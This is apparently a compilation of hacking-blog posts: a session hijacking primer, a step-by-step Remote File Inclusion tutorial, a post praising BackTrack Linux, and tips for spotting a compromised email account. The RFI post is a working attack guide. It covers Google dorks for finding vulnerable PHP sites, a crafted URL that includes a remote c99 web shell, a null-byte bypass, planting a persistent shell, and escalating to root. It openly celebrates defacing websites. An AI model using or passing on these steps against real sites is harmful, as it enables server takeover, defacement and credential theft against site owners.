Session Hijacking : How to hack online Sessions

Session Hijacking : How to hack online Sessions

Hello friends, i am back and from now onwards we will explore the most advanced Hacking Techniques. One of them is Session Hijacking. In today’s tutorial we will discuss How to hack the online sessions using Session Hijacking. In today’s Hacking class, i will explain basics of Session Hijacking like What is session Hijacking and Different types of Session Hijacking attacks and different methods to Hijack the sessions. In my next tutorial that is tomorrow i will explain you in Detail How to Hijack the Sessions and what tools you will need to Hijack the active sessions. So friends read on…

How Session Hijacking works

What is Session Hijacking?

Let’s discuss them in common term’s, Session Hijacking by the name only it suggests that we are hacking someone’s active session and trying to exploit it by taking the unauthorized access over their computer system or Network. So Session Hijacking is the exploitation of valid computer or network session. Sometimes technical guys also call this HTTP cookie theft or more correctly Magic Cookie Hack. Now you guys surely be thinking what is Magic Cookie.

Magic cookie is simply a cookie that is used to authenticate the user on remote server or simply computer. In general, cookies are used to maintain the sessions on the websites and store the remote address of the website. So in Session Hijacking what Hacker does is that he tries to steal the Magic cookies of the active session that’s why its called HTTP cookie Theft. Nowadays several websites has started using HTTPS cookies simply called encrypted cookies. But we all know If encrypter exits so its decrypter also :P..

Session Hijacking is the process of taking over a existing active session. One of the main reason for Hijacking the session is to bypass the authentication process and gain the access to the machine. Since the session is already active so there is no need of re-authenticating and the hacker can easily access the resources and sensitive information like passwords, bank details and much more. 

Different Types of Session Hijacking

Session Hijacking involves two types of attacks :

1. Active attack

2. Passive attack

In Passive attack, the hacker Hijacks a session, but just sits back and watches and records all the traffic that is being sent from the computer or received by the computer. This is useful for finding the sensitive information like username passwords of websites, windows and much more…

In Active attack, hacker finds the active session and takes over it. This is done by forcing one of the parties offline which is usually achieved by DDOS attack (Distributed Denial of service attack) . Now the hacker takes control over the active session and executes the commands on the system that either give him the sensitive information such as passwords or allow him to login at later time.

 There are also some hybrid attacks, where the attacker watches a session for while and then becomes active by taking it over. Another way is to watch the session and periodically inject data into the active session without actually taking it over.

Methods to Hijack Sessions

 There are four main methods used to perpetrate a session hijack. These are:

• Session fixation, where the attacker sets a user’s session id to one known to him, for example by sending the user an email with a link that contains a particular session id. The attacker now only has to wait until the user logs in.
• Session sidejacking, where the attacker uses packet sniffing to read network traffic between two parties to steal the session cookie. Many web sites use SSL encryption for login pages to prevent attackers from seeing the password, but do not use encryption for the rest of the site once authenticated. This allows attackers that can read the network traffic to intercept all the data that is submitted to the server or web pages viewed by the client. Since this data includes the session cookie, it allows him to impersonate the victim, even if the password itself is not compromised. Unsecured Wi-Fi hotspots are particularly vulnerable, as anyone sharing the network will generally be able to read most of the web traffic between other nodes and the access point.
• Alternatively, an attacker with physical access can simply attempt to steal the session key by, for example, obtaining the file or memory contents of the appropriate part of either the user’s computer or the server.
• Cross-site scripting, where the attacker tricks the user’s computer into running code which is treated as trustworthy because it appears to belong to the server, allowing the attacker to obtain a copy of the cookie or perform other operations.

That’s all for today tomorrow we will discuss in detail How to do the Session Hijacking practically. 

I hope you all like this…

If you have any queries ask me in form of comments…

How to hack websites by Remote File Inclusion

Hello friends, in my previous articles about website hacking, i have discussed different ways to hack websites and also i have explained the Website hacking using SQL injection in detail. Today i am going to explain and advanced method of hacking websites that is How to hack websites using Remote File Inclusion. As the name suggests Remote File Inclusion is technique where we inserts the file (in hacking terminology called Shell) in to the Website and gets the admin rights. Lets discuss this type of Website hacking technique in detail, so friends read on…

Remote File Inclusion : Website hacking Method

What is Remote File Inclusion?

Remote File Inclusion is a method of hacking websites and getting the admin rights of the server by inserting a remote file usually called as SHELL (a shell is graphical user interface file which is used to browsing the remote files and running your own code on the web servers) into a website, whose inclusion allows the hackers to execute the server side commands as a current user logged on, and have the access to all the server files. With these rights we can continue to use local exploits to escalate our privileges and get control over the whole server.

Note: Remote File Inclusion (RFI) is the best ever technique to hack websites and more than 60% websites on the internet using PHP are vulnerable to this attack.

Which Websites are Vulnerable to Remote File Inclusion attack?

First and the very basic question arises in the mind of new hackers that How we can find the websites that its prone to remote file inclusion attack. And what are the basic vulnerabilities in the website that we will target to hack any website and web server. Answer to these questions is quite simple. 

Many of the web servers are vulnerable to this type of attack because of PHP’s default settings of register_globals  and allow_url_fopen being enabled. 

Note: In the PHP 6.0, register_globals has been removed but still the second vulnerability remains open, so we can give it a try to latest version PHP websites too. But a good news for hackers is that around 90% websites on the internet still uses old versions of PHP and another good news in those 90% websites, more than 60% websites has default settings enabled. That means we can hack most of the websites and deface them. Isn’t that cool, but as i have said we are ethical hackers we only find vulnerabilities in the websites .

Now lets start step by step Remote file inclusion method to hack websites:

Step 1: Finding the Vulnerable Websites

First of all we have to find the website that gets his pages using the PHP include() function and vulnerable to RFI (Remote File Inclusion). The best technique is to find websites using Google Dorks. Google dorks are simply the queries that are used to identify the specific search results.

Download the list of Dorks for RFI : CLICK HERE

 

I have already listed a lot off GOOGLE DORKS in my previous post of hacking websites, so you can look them here:

How to deface websites using SQL injection.

Step 2: Identifying Vulnerable website

Websites that have the page navigation system similar to below mentioned:

http://target-site.com/index.php?page=PageName

Step 3: Checking Website is Vulnerable or Not

To check if a the website is vulnerable to remote file inclusion attack, we would try to include a website link  instead of PageName as shown below:

http://target-site.com/index.php?page=http://google.com 

Now if the Google Home Page opens, then its confirmed that website is vulnerable to Remote File Inclusion attack and we will continue our attack. If Google homepage doesn’t opens, we will try another website.

Step 4:  Remote Inclusion of Shells

Now we know that website is hackable, so we will now include the shells into the website. There are number of shells available online but my favorite are C99 and r57 because of their extended functionality and features.

There is no need to download these shells on your systems or PC, we can directly use the online resources for doing that but if you wish you can download them from their respective websites. I will not provide these here because its unethical but Google it and u can find them easily. 

To find the a shell the hacker would search Google for: 

inurl:c99.txt

This will display many websites with the shell already up and ready to be included.

Note: you must include a ? after the URL of Shell  so that if anything comes after c99.txt, it will be passed to the shell and not cause any problems.

For future use of Analysis you can download these shells from here:

http://www.localroot.net/

The new URL with the shell included would look like:

 http://target-site.com/index.php?page=http://site.com/c99.txt?

Step 5: Adding Null Byte

Sometimes the PHP script on the server appends “.php” to the end of every included file. So if you included the shell, it would end up looking like “c99.txt.php” and not work. To get around this, you would add a null byte () to the end of c99.txt. This tells the server to ignore everything after c99.txt.

Step 6:  Vulnerabilities Database

In step one, I told you that hackers use Google dorks to look for sites possibly vulnerable to RFIs. An example of a Google dork would be:

  allinurl:.php?page=

This looks for URL’s with .php?page= in them. This is only an example and you most likely won’t find any vulnerable sites with that search. You can try switching around the word “page” with other letters and similar
words.

Hackers usually search vulnerability databases like www.milw0rm.com for already discovered RFI vulnerabilities in site content management systems and search for websites that are running that vulnerable web application with a Google dork.

Step 6: If Attack Successful

If we succeeds in getting the server to parse the shell, then we will be see a screen similar to the following: 

Hacking Website using Shell RFI attack

The shell will display information about the remote server and list all the files and directories on it. From here we would find a directory that has read and write privileges and upload the shell but this time as a .php file so that incase the vulnerability is fixed, he will be able to access it later on.  

Step7: Find Root Privileges on Server

Now we would next find a way to gain root privileges on the system. We can do this by uploading and running local exploits against the server. you can find list of such exploits on milw0rm. We could also search the victim server for configuration files. These files most of the times contain username and passwords for the MYSQL databases and such.

That’s all the way to hack websites using the remote file inclusion method. I hope you all have liked it. And i am sure you all have a lot of questions regrading this, so don’t hesitate and ask in form of comments. I will try to clear all your queries.

How to Protect your Websites and Forums from Remote file inclusion attack?

As we are ethical hackers i will also explain for webmasters to protect their websites from RFI attack.

To protect yourself from RFI attacks, simply make sure you are using up-to-date scripts, and make sure you server php.ini file has register_globals and allow_url_fopen disabled.

Note: Website hacking is illegal, this article is for Educational purposes only.

Thanks for reading.. Enjoy and have Happy Hacking..:)

Best Operating System for Hackers

Hi Friends, Most of my friends and isoftdl users asked me about which operating system is best for hackers and for doing hacking activities like hacking wireless network passwords, network sniffers,reverse engineering tools, application hacking tools and other encrypting and spoofing hacking tools. Today i will share with you which operating system i use for hacking activities. My favorite operating system is Backtrack Linux and Windows XP not because they are easier to use but because i love their vast functionality and features. But you can also give a try to Matriux Operating System and knoppix , Matriux OS is just awesome but its still under construction as designers are still working on it and patching it. Now lets discuss more about functionality of Backtrack operating system. I will not discuss more about windows XP because its so easy to understand that it needs no explanation.

Backtrack : Best Operating system for Hackers

Best Operating System : Backtrack Linux

BackTrack is a Linux-based penetration testing arsenal that aids security professionals in the ability to perform assessments in a purely native environment dedicated to hacking.

Regardless if you’re making BackTrack your primary operating system, booting from a Live DVD, or using your favourite thumb drive, BackTrack has been customized down to every package, kernel configuration, script and patch solely for the purpose of the penetration tester.

BackTrack is intended for all audiences from the most savvy security professionals to early newcomers to the information security field. BackTrack promotes a quick and easy way to find and update the largest database of security tool collection to-date.

Back Track is quite possibly the most comprehensive Linux distribution of security tools. Both hackers and crackers can appreciate the features of this distribution. For black-hat hackers, it provides an easy access to software that facilitates exploitations for secured systems and other reverse engineering. For white-hatters, it is a penetration tester that finds holes in a security scheme. See, everybody wins!

 

Major Features of BackTrack Linux

BackTrack features the latest in security penetration software. The current Linux kernel is patched so that special driver installation is unnecessary for attacks. For example, an Atheros-based wireless networking adapter will no enter monitor mode or inject packets without the MadWiFi driver patch. With BackTrack, you don’t need to worry about that. It’s just plug-and-play ready-to-go!

What’s great is that this Linux distribution comes Live-on-CD. So, no installation is needed. However, what you experience BackTrack, you will realize that it is a must to download this operating system and install it on your Laptop. At the very least, download the VMWare Virtual Appliance for Backtrack. Make sure you also install the VMWare Tools for Linux as well. Many features will still work in VMWare mode.

• Based on: Debian, Ubuntu
• Origin: Switzerland
• Architecture: i386
• Desktop: Fluxbox, KDE
• Category: Forensics, Rescue, Live Medium
• Cost: Free

Hacking Tools:

BackTrack provides users with easy access to a comprehensive and large collection of security-related tools ranging from port scanners to password crackers. Support for Live CD and Live USB functionality allows users to boot BackTrack directly from portable media without requiring installation, though permanent installation to hard disk is also an option.

BackTrack includes many well known security tools including:

• Metasploit integration
• RFMON Injection capable wireless drivers
• Kismet
• Nmap
• Ettercap
• Wireshark (formerly known as Ethereal)
• BeEF (Browser Exploitation Framework)

A large collection of exploits as well as more common place software such as browsers. BackTrack arranges tools into 11 categories:

• Information Gathering
• Network Mapping
• Vulnerability Identification
• Web Application Analysis
• Radio Network Analysis (802.11, Bluetooth, Rfid)
• Penetration (Exploit & Social Engineering Toolkit)
• Privilege Escalation
• Maintaining Access
• Digital Forensics
• Reverse Engineering
• Voice Over IP

and much more…. the list endless and lot more such features….

I hope you have liked this post about what should you look in operating system if you are hacker or want to be a hacker.

IF YOU HAVE ANY QUERIES ASK ME…

Thanks for reading..

Find Unauthorized Activity in Your Email Account

Hello friends, do you think or suspect your email account has been hacked or somebody else is using your account?  Do you suspect that your Email account is under attack? Is email account secured enough that it cannot be hacked? Do you want to make your email account 100% hack proof? If Yes, then this article is for you. So friends read on..

Sometimes our email account has been hacked and we are not aware of that. Someone else i.e. some hacker is accessing your account and might be misusing it. But since we are not aware of that and we still think that our account and its privacy is safe but some third person is using it and accessing our private information and details. Now How you will detect that your account is under attack that How to find unauthorized activity in your email account. Here are few tips.

These are some signs of Unauthorized activity in Your email account:

1. Your new emails are marked as Read even if you’ve not read them.

2. Your emails are moved to Trash or even permanently deleted without your notice.

3. Your emails are being forwarded to a third party email address (check your settings then go to forwarding).

4. Your secondary email address is changed.

5. Phone Information is changed.

If you come across any of the above activities on your email account, then it is a clear indication that your email account is hacked.

There are some additional security features that Gmail provide its users for the Security and safety o your account.

Gmail provides an additional security feature to protect your email account through the means of IP address logging. That is, Gmail records your IP address every time you login to your Gmail account. So, if a third party gets access to your account then even his/her IP is also recorded. To see a list of recorded IP address, scroll down to the bottom of your Gmail account and you’ll see something like this.

You can see from the above figure that Gmail shows the IP address of last login (last account activity). You can click on Details to see the IP address of your last 5 activities. If you find that the IP listed in the logs doesn’t belong to you, then you can suspect unauthorized activity.

Steps to stop unauthorized activity on your email account

1. Verify you mobile phone, so that if your account is somehow got hacked then it will be easier to recover your email password.
2. If you suspect that your account is already hacked then these are the recommended things that you should perform.
a.  Change your Password
b.  Change your security question.
c.  Remove any third party email address (if any) to which your account is set to forward emails.
d.  Make sure that you can access the email account of your secondary email address.
e.  Also change you secondary email password and security question.

This will help you to stop all the illegal activity in your account. But there are several peoples who have asked me that their account is hacked or they forgot the password . Now if your account is already hacked means you are not been able to access your account then i please read the following article that i have written few weeks before. In this article i have explained all the possible ways to recover your email account password back again.

I hope you all like my post. If you like my posts please comment on it.
IF YOU HAVE ANY QUERIES ASK ME !